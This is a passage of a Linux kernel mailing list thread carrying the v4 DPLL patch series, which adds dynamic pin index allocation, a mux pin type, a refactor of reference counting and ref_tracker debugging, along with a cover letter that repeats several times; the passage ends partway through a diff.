operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
Allow drivers to register DPLL pins without manually specifying a pin index. Currently, drivers must provide a unique pin index when calling dpll_pin_get(). This works well for hardware-mapped pins but creates friction for drivers handling virtual pins or those without a strict hardware indexing scheme. Introduce DPLL_PIN_IDX_UNSPEC (U32_MAX). When a driver passes this value as the pin index: 1. The core allocates a unique index using an IDA 2. The allocated index is mapped to a range starting above `INT_MAX` This separation ensures that dynamically allocated indices never collide with standard driver-provided hardware indices, which are assumed to be within the `0` to `INT_MAX` range. The index is automatically freed when the pin is released in dpll_pin_put(). Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- v2: * fixed integer overflow in dpll_pin_idx_free() --- drivers/dpll/dpll_core.c | 48 ++++++++++++++++++++++++++++++++++++++-- include/linux/dpll.h | 2 ++ 2 files changed, 48 insertions(+), 2 deletions(-) diff --git a/drivers/dpll/dpll_core.c b/drivers/dpll/dpll_core.c index b05fe2ba46d91..59081cf2c73ae 100644 --- a/drivers/dpll/dpll_core.c +++ b/drivers/dpll/dpll_core.c @@ -10,6 +10,7 @@ #include <linux/device.h> #include <linux/err.h> +#include <linux/idr.h> #include <linux/property.h> #include <linux/slab.h> #include <linux/string.h> @@ -24,6 +25,7 @@ DEFINE_XARRAY_FLAGS(dpll_device_xa, XA_FLAGS_ALLOC); DEFINE_XARRAY_FLAGS(dpll_pin_xa, XA_FLAGS_ALLOC); static RAW_NOTIFIER_HEAD(dpll_notifier_chain); +static DEFINE_IDA(dpll_pin_idx_ida); static u32 dpll_device_xa_id; static u32 dpll_pin_xa_id; @@ -464,6 +466,36 @@ void dpll_device_unregister(struct dpll_device *dpll, } EXPORT_SYMBOL_GPL(dpll_device_unregister); +static int dpll_pin_idx_alloc(u32 *pin_idx) +{ + int ret; + + if (!pin_idx) + return -EINVAL; + + /* Alloc unique number from IDA. Number belongs to <0, INT_MAX> range */ + ret = ida_alloc(&dpll_pin_idx_ida, GFP_KERNEL); + if (ret < 0) + return ret; + + /* Map the value to dynamic pin index range <INT_MAX+1, U32_MAX> */ + *pin_idx = (u32)ret + INT_MAX + 1; + + return 0; +} + +static void dpll_pin_idx_free(u32 pin_idx) +{ + if (pin_idx <= INT_MAX) + return; /* Not a dynamic pin index */ + + /* Map the index value from dynamic pin index range to IDA range and + * free it. + */ + pin_idx -= (u32)INT_MAX + 1; + ida_free(&dpll_pin_idx_ida, pin_idx); +} + static void dpll_pin_prop_free(struct dpll_pin_properties *prop) { kfree(prop->package_label); @@ -521,9 +553,18 @@ dpll_pin_alloc(u64 clock_id, u32 pin_idx, struct module *module, struct dpll_pin *pin; int ret; + if (pin_idx == DPLL_PIN_IDX_UNSPEC) { + ret = dpll_pin_idx_alloc(&pin_idx); + if (ret) + return ERR_PTR(ret); + } else if (pin_idx > INT_MAX) { + return ERR_PTR(-EINVAL); + } pin = kzalloc(sizeof(*pin), GFP_KERNEL); - if (!pin) - return ERR_PTR(-ENOMEM); + if (!pin) { + ret = -ENOMEM; + goto err_pin_alloc; + } pin->pin_idx = pin_idx; pin->clock_id = clock_id; pin->module = module; @@ -551,6 +592,8 @@ dpll_pin_alloc(u64 clock_id, u32 pin_idx, struct module *module, dpll_pin_prop_free(&pin->prop); err_pin_prop: kfree(pin); +err_pin_alloc: + dpll_pin_idx_free(pin_idx); return ERR_PTR(ret); } @@ -654,6 +697,7 @@ void dpll_pin_put(struct dpll_pin *pin) xa_destroy(&pin->ref_sync_pins); dpll_pin_prop_free(&pin->prop); fwnode_handle_put(pin->fwnode); + dpll_pin_idx_free(pin->pin_idx); kfree_rcu(pin, rcu); } mutex_unlock(&dpll_lock); diff --git a/include/linux/dpll.h b/include/linux/dpll.h index 8ed90dfc65f05..8fff048131f1d 100644 --- a/include/linux/dpll.h +++ b/include/linux/dpll.h @@ -240,6 +240,8 @@ int dpll_device_register(struct dpll_device *dpll, enum dpll_type type, void dpll_device_unregister(struct dpll_device *dpll, const struct dpll_device_ops *ops, void *priv); +#define DPLL_PIN_IDX_UNSPEC U32_MAX + struct dpll_pin * dpll_pin_get(u64 clock_id, u32 dev_driver_id, struct module *module, const struct dpll_pin_properties *prop); -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:33 +0100", "thread_id": "20260202171638.17427-4-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
Add parsing for the "mux" string in the 'connection-type' pin property mapping it to DPLL_PIN_TYPE_MUX. Recognizing this type in the driver allows these pins to be taken as parent pins for pin-on-pin pins coming from different modules (e.g. network drivers). Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- drivers/dpll/zl3073x/prop.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/drivers/dpll/zl3073x/prop.c b/drivers/dpll/zl3073x/prop.c index 4ed153087570b..ad1f099cbe2b5 100644 --- a/drivers/dpll/zl3073x/prop.c +++ b/drivers/dpll/zl3073x/prop.c @@ -249,6 +249,8 @@ struct zl3073x_pin_props *zl3073x_pin_props_get(struct zl3073x_dev *zldev, props->dpll_props.type = DPLL_PIN_TYPE_INT_OSCILLATOR; else if (!strcmp(type, "synce")) props->dpll_props.type = DPLL_PIN_TYPE_SYNCE_ETH_PORT; + else if (!strcmp(type, "mux")) + props->dpll_props.type = DPLL_PIN_TYPE_MUX; else dev_warn(zldev->dev, "Unknown or unsupported pin type '%s'\n", -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:34 +0100", "thread_id": "20260202171638.17427-4-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
Refactor the reference counting mechanism for DPLL devices and pins to improve consistency and prevent potential lifetime issues. Introduce internal helpers __dpll_{device,pin}_{hold,put}() to centralize reference management. Update the internal XArray reference helpers (dpll_xa_ref_*) to automatically grab a reference to the target object when it is added to a list, and release it when removed. This ensures that objects linked internally (e.g., pins referenced by parent pins) are properly kept alive without relying on the caller to manually manage the count. Consequently, remove the now redundant manual `refcount_inc/dec` calls in dpll_pin_on_pin_{,un}register()`, as ownership is now correctly handled by the dpll_xa_ref_* functions. Additionally, ensure that dpll_device_{,un}register()` takes/releases a reference to the device, ensuring the device object remains valid for the duration of its registration. Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- drivers/dpll/dpll_core.c | 74 +++++++++++++++++++++++++++------------- 1 file changed, 50 insertions(+), 24 deletions(-) diff --git a/drivers/dpll/dpll_core.c b/drivers/dpll/dpll_core.c index 59081cf2c73ae..f6ab4f0cad84d 100644 --- a/drivers/dpll/dpll_core.c +++ b/drivers/dpll/dpll_core.c @@ -83,6 +83,45 @@ void dpll_pin_notify(struct dpll_pin *pin, unsigned long action) call_dpll_notifiers(action, &info); } +static void __dpll_device_hold(struct dpll_device *dpll) +{ + refcount_inc(&dpll->refcount); +} + +static void __dpll_device_put(struct dpll_device *dpll) +{ + if (refcount_dec_and_test(&dpll->refcount)) { + ASSERT_DPLL_NOT_REGISTERED(dpll); + WARN_ON_ONCE(!xa_empty(&dpll->pin_refs)); + xa_destroy(&dpll->pin_refs); + xa_erase(&dpll_device_xa, dpll->id); + WARN_ON(!list_empty(&dpll->registration_list)); + kfree(dpll); + } +} + +static void __dpll_pin_hold(struct dpll_pin *pin) +{ + refcount_inc(&pin->refcount); +} + +static void dpll_pin_idx_free(u32 pin_idx); +static void dpll_pin_prop_free(struct dpll_pin_properties *prop); + +static void __dpll_pin_put(struct dpll_pin *pin) +{ + if (refcount_dec_and_test(&pin->refcount)) { + xa_erase(&dpll_pin_xa, pin->id); + xa_destroy(&pin->dpll_refs); + xa_destroy(&pin->parent_refs); + xa_destroy(&pin->ref_sync_pins); + dpll_pin_prop_free(&pin->prop); + fwnode_handle_put(pin->fwnode); + dpll_pin_idx_free(pin->pin_idx); + kfree_rcu(pin, rcu); + } +} + struct dpll_device *dpll_device_get_by_id(int id) { if (xa_get_mark(&dpll_device_xa, id, DPLL_REGISTERED)) @@ -152,6 +191,7 @@ dpll_xa_ref_pin_add(struct xarray *xa_pins, struct dpll_pin *pin, reg->ops = ops; reg->priv = priv; reg->cookie = cookie; + __dpll_pin_hold(pin); if (ref_exists) refcount_inc(&ref->refcount); list_add_tail(&reg->list, &ref->registration_list); @@ -174,6 +214,7 @@ static int dpll_xa_ref_pin_del(struct xarray *xa_pins, struct dpll_pin *pin, if (WARN_ON(!reg)) return -EINVAL; list_del(&reg->list); + __dpll_pin_put(pin); kfree(reg); if (refcount_dec_and_test(&ref->refcount)) { xa_erase(xa_pins, i); @@ -231,6 +272,7 @@ dpll_xa_ref_dpll_add(struct xarray *xa_dplls, struct dpll_device *dpll, reg->ops = ops; reg->priv = priv; reg->cookie = cookie; + __dpll_device_hold(dpll); if (ref_exists) refcount_inc(&ref->refcount); list_add_tail(&reg->list, &ref->registration_list); @@ -253,6 +295,7 @@ dpll_xa_ref_dpll_del(struct xarray *xa_dplls, struct dpll_device *dpll, if (WARN_ON(!reg)) return; list_del(&reg->list); + __dpll_device_put(dpll); kfree(reg); if (refcount_dec_and_test(&ref->refcount)) { xa_erase(xa_dplls, i); @@ -323,8 +366,8 @@ dpll_device_get(u64 clock_id, u32 device_idx, struct module *module) if (dpll->clock_id == clock_id && dpll->device_idx == device_idx && dpll->module == module) { + __dpll_device_hold(dpll); ret = dpll; - refcount_inc(&ret->refcount); break; } } @@ -347,14 +390,7 @@ EXPORT_SYMBOL_GPL(dpll_device_get); void dpll_device_put(struct dpll_device *dpll) { mutex_lock(&dpll_lock); - if (refcount_dec_and_test(&dpll->refcount)) { - ASSERT_DPLL_NOT_REGISTERED(dpll); - WARN_ON_ONCE(!xa_empty(&dpll->pin_refs)); - xa_destroy(&dpll->pin_refs); - xa_erase(&dpll_device_xa, dpll->id); - WARN_ON(!list_empty(&dpll->registration_list)); - kfree(dpll); - } + __dpll_device_put(dpll); mutex_unlock(&dpll_lock); } EXPORT_SYMBOL_GPL(dpll_device_put); @@ -416,6 +452,7 @@ int dpll_device_register(struct dpll_device *dpll, enum dpll_type type, reg->ops = ops; reg->priv = priv; dpll->type = type; + __dpll_device_hold(dpll); first_registration = list_empty(&dpll->registration_list); list_add_tail(&reg->list, &dpll->registration_list); if (!first_registration) { @@ -455,6 +492,7 @@ void dpll_device_unregister(struct dpll_device *dpll, return; } list_del(&reg->list); + __dpll_device_put(dpll); kfree(reg); if (!list_empty(&dpll->registration_list)) { @@ -666,8 +704,8 @@ dpll_pin_get(u64 clock_id, u32 pin_idx, struct module *module, if (pos->clock_id == clock_id && pos->pin_idx == pin_idx && pos->module == module) { + __dpll_pin_hold(pos); ret = pos; - refcount_inc(&ret->refcount); break; } } @@ -690,16 +728,7 @@ EXPORT_SYMBOL_GPL(dpll_pin_get); void dpll_pin_put(struct dpll_pin *pin) { mutex_lock(&dpll_lock); - if (refcount_dec_and_test(&pin->refcount)) { - xa_erase(&dpll_pin_xa, pin->id); - xa_destroy(&pin->dpll_refs); - xa_destroy(&pin->parent_refs); - xa_destroy(&pin->ref_sync_pins); - dpll_pin_prop_free(&pin->prop); - fwnode_handle_put(pin->fwnode); - dpll_pin_idx_free(pin->pin_idx); - kfree_rcu(pin, rcu); - } + __dpll_pin_put(pin); mutex_unlock(&dpll_lock); } EXPORT_SYMBOL_GPL(dpll_pin_put); @@ -740,8 +769,8 @@ struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode) mutex_lock(&dpll_lock); xa_for_each(&dpll_pin_xa, index, pin) { if (pin->fwnode == fwnode) { + __dpll_pin_hold(pin); ret = pin; - refcount_inc(&ret->refcount); break; } } @@ -893,7 +922,6 @@ int dpll_pin_on_pin_register(struct dpll_pin *parent, struct dpll_pin *pin, ret = dpll_xa_ref_pin_add(&pin->parent_refs, parent, ops, priv, pin); if (ret) goto unlock; - refcount_inc(&pin->refcount); xa_for_each(&parent->dpll_refs, i, ref) { ret = __dpll_pin_register(ref->dpll, pin, ops, priv, parent); if (ret) { @@ -913,7 +941,6 @@ int dpll_pin_on_pin_register(struct dpll_pin *parent, struct dpll_pin *pin, parent); dpll_pin_delete_ntf(pin); } - refcount_dec(&pin->refcount); dpll_xa_ref_pin_del(&pin->parent_refs, parent, ops, priv, pin); unlock: mutex_unlock(&dpll_lock); @@ -940,7 +967,6 @@ void dpll_pin_on_pin_unregister(struct dpll_pin *parent, struct dpll_pin *pin, mutex_lock(&dpll_lock); dpll_pin_delete_ntf(pin); dpll_xa_ref_pin_del(&pin->parent_refs, parent, ops, priv, pin); - refcount_dec(&pin->refcount); xa_for_each(&pin->dpll_refs, i, ref) __dpll_pin_unregister(ref->dpll, pin, ops, priv, parent); mutex_unlock(&dpll_lock); -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:35 +0100", "thread_id": "20260202171638.17427-4-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
Add support for the REF_TRACKER infrastructure to the DPLL subsystem. When enabled, this allows developers to track and debug reference counting leaks or imbalances for dpll_device and dpll_pin objects. It records stack traces for every get/put operation and exposes this information via debugfs at: /sys/kernel/debug/ref_tracker/dpll_device_* /sys/kernel/debug/ref_tracker/dpll_pin_* The following API changes are made to support this: 1. dpll_device_get() / dpll_device_put() now accept a 'dpll_tracker *' (which is a typedef to 'struct ref_tracker *' when enabled, or an empty struct otherwise). 2. dpll_pin_get() / dpll_pin_put() and fwnode_dpll_pin_find() similarly accept the tracker argument. 3. Internal registration structures now hold a tracker to associate the reference held by the registration with the specific owner. All existing in-tree drivers (ice, mlx5, ptp_ocp, zl3073x) are updated to pass NULL for the new tracker argument, maintaining current behavior while enabling future debugging capabilities. Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Co-developed-by: Petr Oros <poros@redhat.com> Signed-off-by: Petr Oros <poros@redhat.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- v4: * added missing tracker parameter to fwnode_dpll_pin_find() stub v3: * added Kconfig dependency on STACKTRACE_SUPPORT and DEBUG_KERNEL --- drivers/dpll/Kconfig | 15 +++ drivers/dpll/dpll_core.c | 98 ++++++++++++++----- drivers/dpll/dpll_core.h | 5 + drivers/dpll/zl3073x/dpll.c | 12 +-- drivers/net/ethernet/intel/ice/ice_dpll.c | 14 +-- .../net/ethernet/mellanox/mlx5/core/dpll.c | 13 +-- drivers/ptp/ptp_ocp.c | 15 +-- include/linux/dpll.h | 21 ++-- 8 files changed, 139 insertions(+), 54 deletions(-) diff --git a/drivers/dpll/Kconfig b/drivers/dpll/Kconfig index ade872c915ac6..be98969f040ab 100644 --- a/drivers/dpll/Kconfig +++ b/drivers/dpll/Kconfig @@ -8,6 +8,21 @@ menu "DPLL device support" config DPLL bool +config DPLL_REFCNT_TRACKER + bool "DPLL reference count tracking" + depends on DEBUG_KERNEL && STACKTRACE_SUPPORT && DPLL + select REF_TRACKER + help + Enable reference count tracking for DPLL devices and pins. + This helps debugging reference leaks and use-after-free bugs + by recording stack traces for each get/put operation. + + The tracking information is exposed via debugfs at: + /sys/kernel/debug/ref_tracker/dpll_device_* + /sys/kernel/debug/ref_tracker/dpll_pin_* + + If unsure, say N. + source "drivers/dpll/zl3073x/Kconfig" endmenu diff --git a/drivers/dpll/dpll_core.c b/drivers/dpll/dpll_core.c index f6ab4f0cad84d..627a5b39a0efd 100644 --- a/drivers/dpll/dpll_core.c +++ b/drivers/dpll/dpll_core.c @@ -41,6 +41,7 @@ struct dpll_device_registration { struct list_head list; const struct dpll_device_ops *ops; void *priv; + dpll_tracker tracker; }; struct dpll_pin_registration { @@ -48,6 +49,7 @@ struct dpll_pin_registration { const struct dpll_pin_ops *ops; void *priv; void *cookie; + dpll_tracker tracker; }; static int call_dpll_notifiers(unsigned long action, void *info) @@ -83,33 +85,68 @@ void dpll_pin_notify(struct dpll_pin *pin, unsigned long action) call_dpll_notifiers(action, &info); } -static void __dpll_device_hold(struct dpll_device *dpll) +static void dpll_device_tracker_alloc(struct dpll_device *dpll, + dpll_tracker *tracker) { +#ifdef CONFIG_DPLL_REFCNT_TRACKER + ref_tracker_alloc(&dpll->refcnt_tracker, tracker, GFP_KERNEL); +#endif +} + +static void dpll_device_tracker_free(struct dpll_device *dpll, + dpll_tracker *tracker) +{ +#ifdef CONFIG_DPLL_REFCNT_TRACKER + ref_tracker_free(&dpll->refcnt_tracker, tracker); +#endif +} + +static void __dpll_device_hold(struct dpll_device *dpll, dpll_tracker *tracker) +{ + dpll_device_tracker_alloc(dpll, tracker); refcount_inc(&dpll->refcount); } -static void __dpll_device_put(struct dpll_device *dpll) +static void __dpll_device_put(struct dpll_device *dpll, dpll_tracker *tracker) { + dpll_device_tracker_free(dpll, tracker); if (refcount_dec_and_test(&dpll->refcount)) { ASSERT_DPLL_NOT_REGISTERED(dpll); WARN_ON_ONCE(!xa_empty(&dpll->pin_refs)); xa_destroy(&dpll->pin_refs); xa_erase(&dpll_device_xa, dpll->id); WARN_ON(!list_empty(&dpll->registration_list)); + ref_tracker_dir_exit(&dpll->refcnt_tracker); kfree(dpll); } } -static void __dpll_pin_hold(struct dpll_pin *pin) +static void dpll_pin_tracker_alloc(struct dpll_pin *pin, dpll_tracker *tracker) { +#ifdef CONFIG_DPLL_REFCNT_TRACKER + ref_tracker_alloc(&pin->refcnt_tracker, tracker, GFP_KERNEL); +#endif +} + +static void dpll_pin_tracker_free(struct dpll_pin *pin, dpll_tracker *tracker) +{ +#ifdef CONFIG_DPLL_REFCNT_TRACKER + ref_tracker_free(&pin->refcnt_tracker, tracker); +#endif +} + +static void __dpll_pin_hold(struct dpll_pin *pin, dpll_tracker *tracker) +{ + dpll_pin_tracker_alloc(pin, tracker); refcount_inc(&pin->refcount); } static void dpll_pin_idx_free(u32 